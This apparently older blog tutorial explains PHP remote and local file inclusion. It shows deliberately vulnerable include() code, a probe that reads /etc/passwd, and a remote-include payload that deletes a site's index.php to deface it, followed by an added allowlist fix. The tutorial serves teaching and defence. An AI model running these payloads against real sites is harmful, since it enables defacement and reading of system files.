Tuesday, February 15, 2011

What is RFI/LFI (Remote/Local File Include)

Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.

Example Vulnerable Code - index.php (PHP)


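PHP Code:
<?php
// $page comes straight from the query string and is never validated
$page = $_GET['p'];
if (isset($page)) {
    // Vulnerable: user-controlled path or URL is passed to include()
    include($page);
} else {
    include("home.php");
}
?>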

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI, but it may still be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; otherwise, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server:

PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

If we then view "index.php?p=http://our.site.com/malicious.php", our malicious code will be run on their server, and their site will now simply say 'Hacked'.
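
One way to close the hole in the vulnerable index.php shown earlier, as an added example that is not part of the original post: the `p` parameter is looked up in a fixed allowlist instead of being handed to include(). The page names and file names in `PAGES` and the helper `resolve_page()` are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the vulnerable index.php.
// Page names and file names below are assumed; adjust to the real site.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the untrusted ?p= value to a file from the fixed allowlist.
 * Returns null for anything not listed (URLs, absolute paths such as
 * /etc/passwd, ../ traversal, arrays from ?p[]=...), so the request
 * value itself never reaches include().
 */
function resolve_page($requested): ?string
{
    if ($requested === null) {
        return PAGES['home'];   // same default as the original script
    }
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGES[$requested];
}

$file = resolve_page($_GET['p'] ?? null);

if ($file === null) {
    http_response_code(404);
    // Record the rejected value for detection; json_encode keeps the
    // log entry on one line even if the input contains control characters.
    error_log('rejected include request: p=' . json_encode($_GET['p']));
    exit('Page not found');
}

// Only a constant from PAGES, anchored to this directory, is included.
include __DIR__ . '/' . $file;
```

With this version both test inputs from the section above ("http://www.google.com/" and "/etc/passwd") return a 404 and leave a log entry. Keeping `allow_url_include = Off` in php.ini (the PHP default) blocks the remote case independently, but it does nothing for local file inclusion, so the allowlist is still needed.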
